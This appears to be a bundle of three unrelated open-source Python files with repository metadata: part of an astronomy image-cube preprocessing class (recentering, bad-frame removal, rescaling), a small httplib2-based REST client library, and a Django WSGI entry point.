hp.plot_cubes(self.cube, **kwargs)
def recenter(self, method='2dfit', xy=None, subi_size=5, model='gauss',
nproc=1, imlib='vip-fft', interpolation='lanczos4',
offset=None, negative=False, threshold=False,
save_shifts=False, cy_1=None, cx_1=None, upsample_factor=100,
alignment_iter=5, gamma=1, min_spat_freq=0.5, max_spat_freq=3,
recenter_median=False, sigfactor=6, cropsize=101, hsize=0.4,
step=0.01, mask_center=None, verbose=True, debug=False,
plot=True):
""" Frame to frame recentering.
Parameters
----------
method : {'2dfit', 'dftups', 'dftupspeckles', 'satspots', 'radon'}, optional
Recentering method.
        xy : tuple of ints or tuple of 4 tuples of ints, optional
            For the 2d fitting, ``xy`` are the coordinates of the center of
            the subimage (wrt the original frame). For the satellite spots
            method, it is a tuple with the X,Y coordinates of the 4 satellite
            spots. When the spots are in an X configuration, the order is:
            top-left, top-right, bottom-left and bottom-right. When the spots
            are in a + (cross-like) configuration, the order is: top, right,
            left, bottom.
subi_size : int, optional
Size of the square subimage sides in pixels.
model : str, optional
[method=2dfit] Sets the type of fit to be used.
'gauss' for a 2d Gaussian fit and 'moff' for a 2d Moffat fit.
nproc : int or None, optional
Number of processes (>1) for parallel computing. If 1 then it runs
in serial. If None the number of processes will be set to
(cpu_count()/2).
        imlib : {'opencv', 'ndimage-fourier', 'ndimage-interp', 'vip-fft'}, str opt
            Library or method used for performing the image shift.
            'ndimage-fourier' performs a Fourier shift operation and better
            preserves the pixel values (and therefore the flux and photometry).
            Interpolation-based shifts ('opencv' and 'ndimage-interp') are
            faster than the Fourier shift. 'opencv' is recommended when speed
            is critical.
        interpolation : {'bicubic', 'bilinear', 'nearneig'}, optional
            Only used if ``imlib`` is set to 'opencv' or 'ndimage-interp', in
            which case the images are shifted via interpolation. For the
            'ndimage-interp' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and 'biquintic' the slowest. 'nearneig' is the
            worst option for interpolating noisy astronomical images.
            For the 'opencv' library: 'nearneig', 'bilinear', 'bicubic',
            'lanczos4'. The 'nearneig' interpolation is the fastest and
            'lanczos4' the slowest but the most accurate. 'lanczos4' is the
            default.
offset : tuple of floats, optional
[method=2dfit] If None the region of the frames
used for the 2d Gaussian/Moffat fit is shifted to the center of the
images (2d arrays). If a tuple is given it serves as the offset of
the fitted area wrt the center of the 2d arrays.
negative : bool, optional
[method=2dfit/dftups/dftupspeckles] If True a negative 2d
Gaussian/Moffat fit is performed.
threshold : bool, optional
[method=2dfit] If True the background pixels
(estimated using sigma clipped statistics) will be replaced by
small random Gaussian noise.
save_shifts : bool, optional
[method=2dfit/dftups] Whether to save the shifts to a file in disk.
cy_1, cx_1 : int, optional
[method=dftups] Coordinates of the center of the
subimage for fitting a 2d Gaussian and centroiding the 1st frame.
upsample_factor : int, optional
[method=dftups] Upsampling factor (default 100).
Images will be registered to within 1/upsample_factor of a pixel.
alignment_iter : int, optional
[method=dftupspeckles] Number of alignment
iterations (recomputes median after each iteration).
gamma : int, optional
[method=dftupspeckles] Applies a gamma correction
to emphasize speckles (useful for faint stars).
min_spat_freq : float, optional
[method=dftupspeckles] Spatial frequency for high
pass filter.
max_spat_freq : float, optional
[method=dftupspeckles] Spatial frequency for low
pass filter.
recenter_median : bool, optional
[method=dftupspeckles] Recenter the frames at each
iteration based on the gaussian fit.
sigfactor : int, optional
[method=satspots] The background pixels will
be thresholded before fitting a 2d Gaussian to the data using sigma
clipped statistics. All values smaller than (MEDIAN +
sigfactor*STDDEV) will be replaced by small random Gaussian noise.
cropsize : odd int, optional
[method=radon] Size in pixels of the cropped central area of the
input array that will be used. It should be large enough to contain
the satellite spots.
        hsize : float, optional
            [method=radon] Size of the box for the grid search. The frame is
            shifted in each direction from the center, over a length ``hsize``
            with the given ``step``.
step : float, optional
[method=radon] The step of the coordinates change.
mask_center : None or int, optional
[method=radon] If None the central area of the frame is kept. If int
a centered zero mask will be applied to the frame. By default the
center isn't masked.
verbose : bool, optional
            Whether to print to stdout the timing and additional info.
debug : bool, optional
If True debug information is printed and plotted.
plot : bool, optional
Whether to plot the shifts.
"""
if method == '2dfit':
if self.fwhm is None:
raise ValueError('FWHM has not been set')
self.cube = cube_recenter_2dfit(
self.cube, xy, self.fwhm, subi_size, model, nproc, imlib,
interpolation, offset, negative, threshold, save_shifts, False,
verbose, debug, plot
)
elif method == 'dftups':
if self.fwhm is None:
raise ValueError('FWHM has not been set')
self.cube = cube_recenter_dft_upsampling(
self.cube, cy_1, cx_1, negative, self.fwhm, subi_size,
upsample_factor, imlib, interpolation, False, verbose,
save_shifts, debug, plot
)
elif method == 'dftupspeckles':
if self.fwhm is None:
raise ValueError('FWHM has not been set')
res = cube_recenter_via_speckles(
self.cube, self.cuberef, alignment_iter, gamma, min_spat_freq,
max_spat_freq, self.fwhm, debug, negative, recenter_median,
subi_size, imlib, interpolation, plot
)
            self.cube = res[0]
            if self.cuberef is not None:
                self.cuberef = res[1]
elif method == 'satspots':
self.cube, _, _ = cube_recenter_satspots(
self.cube, xy, subi_size, sigfactor, plot, debug, verbose
)
elif method == 'radon':
self.cube = cube_recenter_radon(
self.cube, full_output=False, verbose=verbose, imlib=imlib,
interpolation=interpolation, cropsize=cropsize, hsize=hsize,
step=step, mask_center=mask_center, nproc=nproc, debug=debug
)
else:
raise ValueError('Method not recognized')
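    # Recentering sketches; the coordinates are placeholders for the
    # approximate star position in the frames:
    #
    #   ds.recenter(method='2dfit', xy=(63, 64), subi_size=7, model='gauss')
    #   ds.recenter(method='dftups', cy_1=63, cx_1=64, upsample_factor=100)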
def remove_badframes(self, method='corr', frame_ref=None, crop_size=30,
dist='pearson', percentile=20, stat_region='annulus',
inner_radius=10, width=10, top_sigma=1.0,
low_sigma=1.0, window=None, roundlo=-0.2, roundhi=0.2,
lambda_ref=0, plot=True, verbose=True):
"""
Find outlying/bad frames and slice the cube accordingly.
        Besides modifying ``self.cube`` and ``self.angles``, this also sets
        ``self.good_indices``, which contains the indices of the frames that
        were kept.
Parameters
----------
method : {'corr', 'pxstats', 'ellip'}, optional
Method which is used to determine bad frames. Refer to the
``preproc.badframes`` submodule for explanation of the different
methods.
frame_ref : int, 2d array or None, optional
[method=corr] Index of the frame that will be used as a reference or
2d reference array.
crop_size : int, optional
[method=corr] Size in pixels of the square subframe to be analyzed.
dist : {'sad','euclidean','mse','pearson','spearman'}, optional
[method=corr] One of the similarity or dissimilarity measures from
function vip_hci.stats.distances.cube_distance().
percentile : float, optional
[method=corr] The percentage of frames that will be discarded
[0..100].
stat_region : {'annulus', 'circle'}, optional
[method=pxstats] Whether to take the statistics from a circle or an
annulus.
        inner_radius : int, optional
            [method=pxstats] If ``stat_region`` is 'annulus' then
            ``inner_radius`` is the inner radius of the annular region. If
            ``stat_region`` is 'circle' then ``inner_radius`` is the radius of
            the aperture.
        width : int, optional
            [method=pxstats] Width of the annulus. Ignored if ``stat_region``
            is 'circle'.
top_sigma : int, optional
[method=pxstats] Top boundary for rejection.
low_sigma : int, optional
[method=pxstats] Lower boundary for rejection.
window : int, optional
[method=pxstats] Window for smoothing the median and getting the
rejection statistic.
        roundlo, roundhi : float, optional
            [method=ellip] Lower and higher bounds for the ellipticity.
lambda_ref : int, optional
[4D cube] Which wavelength to consider when determining bad frames
on a 4D cube.
        plot : bool, optional
            If True, plots the mean fluctuation as a function of the frames
            and the rejection boundaries.
verbose : bool, optional
Show debug output.
"""
if self.cube.ndim == 4:
tcube = self.cube[lambda_ref]
else:
tcube = self.cube
if method == 'corr':
if frame_ref is None:
print("Correlation method selected but `frame_ref` is missing")
print("Setting the 1st frame as the reference")
frame_ref = 0
self.good_indices, _ = cube_detect_badfr_correlation(tcube,
frame_ref, crop_size, dist, percentile,
plot, verbose)
elif method == 'pxstats':
self.good_indices, _ = cube_detect_badfr_pxstats(tcube, stat_region,
inner_radius, width, top_sigma,
low_sigma, window, plot, verbose)
elif method == 'ellip':
if self.cube.ndim == 4:
fwhm = self.fwhm[lambda_ref]
else:
fwhm = self.fwhm
self.good_indices, _ = cube_detect_badfr_ellipticity(tcube, fwhm,
crop_size, roundlo, roundhi, plot,
verbose)
else:
raise ValueError('Bad frames detection method not recognized')
if self.cube.ndim == 4:
self.cube = self.cube[:, self.good_indices]
else:
self.cube = self.cube[self.good_indices]
if verbose:
print("New cube shape: {}".format(self.cube.shape))
if self.angles is not None:
self.angles = self.angles[self.good_indices]
if verbose:
msg = "New parallactic angles vector shape: {}"
print(msg.format(self.angles.shape))
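    # Bad-frame rejection sketch; the percentile value is illustrative:
    #
    #   ds.remove_badframes(method='corr', frame_ref=0, crop_size=31,
    #                       dist='pearson', percentile=10)
    #   print(ds.good_indices)   # indices of the frames that were kept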
def rescale(self, scale, imlib='ndimage', interpolation='bicubic',
verbose=True):
""" Resampling the pixels (upscaling or downscaling the frames).
Parameters
----------
scale : int, float or tuple
Scale factor for upsampling or downsampling the frames in the cube.
If a tuple it corresponds to the scale along x and y.
imlib : {'ndimage', 'opencv', 'vip-fft'}, str optional
Library used for image transformations. ndimage is the default.
interpolation : str, optional
            For the 'ndimage' library: 'nearneig', 'bilinear', 'bicuadratic',
            'bicubic', 'biquartic', 'biquintic'. The 'nearneig' interpolation
            is the fastest and 'biquintic' the slowest. 'nearneig' is the
            worst option for interpolating noisy astronomical images.
            For the 'opencv' library: 'nearneig', 'bilinear', 'bicubic',
            'lanczos4'. The 'nearneig' interpolation is the fastest and
            'lanczos4' the slowest but the most accurate.
verbose : bool, optional
Whether to print out additional info such as the new cube shape.
"""
self.cube = cube_px_resampling(self.cube, scale, imlib, interpolation,
verbose)
def subsample(self, window, mode='mean'):
""" Temporally sub-sampling the sequence (3d or 4d cube).
Parameters
----------
window : int
Window for mean/median.
mode : {'mean', 'median'}, optional
Switch for choosing mean or median.
"""
if self.angles is not None:
self.cube, self.angles = cube_subsample(self.cube, window,
mode, self.angles)
else:
self.cube = cube_subsample(self.cube, window, mode)
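    # End-to-end sketch of a basic ADI pre-processing flow with this class.
    # File names, pixel scale and coordinates are placeholders:
    #
    #   ds = Dataset('cube.fits', angles='angles.fits', psf='psf.fits',
    #                px_scale=0.0272)
    #   ds.normalize_psf(fit_fwhm=True)
    #   ds.remove_badframes(method='pxstats')
    #   ds.recenter(method='2dfit', xy=(63, 64), subi_size=7)
    #   ds.derotate()
    #   frame = ds.collapse(mode='median')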
|
vortex-exoplanet/VIP
|
vip_hci/hci_dataset.py
|
Python
|
mit
| 55,139
|
import base64
import httplib2
import logging
import mimetypes
import mimetools
import urllib
import urlparse
HTTP_STATUS_OK = '200'
logger = logging.getLogger(__name__)
class RestClient(object):
content_type = None
def __init__(self, base_url, username=None, password=None,
connection_class=None, **kwargs):
if connection_class is None:
connection_class = Connection
self._connection = connection_class(base_url, username, password,
**kwargs)
def get(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'get', args=args, data=data,
headers=headers)
def put(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'put', args=args, data=data,
headers=headers)
def delete(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'delete', args=args, data=data,
headers=headers)
def post(self, resource, args=None, data=None, headers=None):
return self._request(resource, 'post', args=args, data=data,
headers=headers)
def _request(self, resource, method, args=None, data=None, headers=None):
response_data = None
request_body = self._serialize(data)
response_headers, response_content = \
self._connection.request(resource, method, args=args,
body=request_body, headers=headers,
content_type=self.content_type)
if response_headers.get('status') == HTTP_STATUS_OK:
response_data = self._deserialize(response_content)
return Response(response_headers, response_content, response_data)
def _serialize(self, data):
return unicode(data)
def _deserialize(self, data):
return unicode(data)
class JsonRestClient(RestClient):
content_type = 'application/json'
def _serialize(self, data):
if data:
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise RuntimeError('simplejson not installed')
return json.dumps(data)
return None
def _deserialize(self, data):
if data:
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise RuntimeError('simplejson not installed')
return json.loads(data)
return None
class XmlRestClient(RestClient):
content_type = 'text/xml'
class Response(object):
def __init__(self, headers, content, data):
self.headers = headers
self.content = content
self.data = data
self.status_code = int(headers.get('status', '500'))
def __repr__(self):
return '<Response %s: %s>' % (self.status_code, self.__dict__)
class BaseConnection(object):
def __init__(self, base_url, username=None, password=None):
self.base_url = base_url
self.username = username
self.password = password
self.url = urlparse.urlparse(base_url)
(scheme, netloc, path, query, fragment) = urlparse.urlsplit(base_url)
self.scheme = scheme
self.host = netloc
self.path = path
def _get_content_type(self, filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def request(self, resource, method="get", args=None, body=None,
headers=None, content_type=None):
raise NotImplementedError
class Connection(BaseConnection):
def __init__(self, *args, **kwargs):
cache = kwargs.pop('cache', None)
        timeout = kwargs.pop('timeout', None)
proxy_info = kwargs.pop('proxy_info', None)
super(Connection, self).__init__(*args, **kwargs)
self._conn = httplib2.Http(cache=cache, timeout=timeout,
proxy_info=proxy_info)
self._conn.follow_all_redirects = True
if self.username and self.password:
self._conn.add_credentials(self.username, self.password)
def request(self, resource, method, args=None, body=None, headers=None,
content_type=None):
if headers is None:
headers = {}
params = None
path = resource
headers['User-Agent'] = 'Basic Agent'
BOUNDARY = mimetools.choose_boundary()
CRLF = u'\r\n'
if body:
if not headers.get('Content-Type', None):
headers['Content-Type'] = content_type or 'text/plain'
headers['Content-Length'] = str(len(body))
else:
if 'Content-Length' in headers:
del headers['Content-Length']
headers['Content-Type'] = 'text/plain'
if args:
if method == "get":
path += u"?" + urllib.urlencode(args)
elif method == "put" or method == "post":
headers['Content-Type'] = \
'application/x-www-form-urlencoded'
body = urllib.urlencode(args)
request_path = []
# Normalise the / in the url path
if self.path != "/":
if self.path.endswith('/'):
request_path.append(self.path[:-1])
else:
request_path.append(self.path)
if path.startswith('/'):
request_path.append(path[1:])
else:
request_path.append(path)
response_headers, response_content = \
self._conn.request(u"%s://%s%s" % (self.scheme, self.host,
u'/'.join(request_path)), method.upper(),
body=body, headers=headers)
return response_headers, response_content
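# Usage sketch; the base URL, credentials and resource path are placeholders:
#
#   client = JsonRestClient('http://example.com/api', 'user', 'secret')
#   response = client.get('/items', args={'page': 1})
#   if response.status_code == 200:
#       print response.data   # deserialized JSON (Python 2 syntax, as above)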
|
nowells/python-wellrested
|
wellrested/connections/__init__.py
|
Python
|
mit
| 6,125
|
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "frigg.settings")
from django.core.wsgi import get_wsgi_application # noqa # isort:skip
application = get_wsgi_application()
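# Typically served by a WSGI HTTP server, e.g. (assuming gunicorn is
# installed):
#
#   gunicorn frigg.wsgi:application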
|
frigg/frigg-hq
|
frigg/wsgi.py
|
Python
|
mit
| 187
|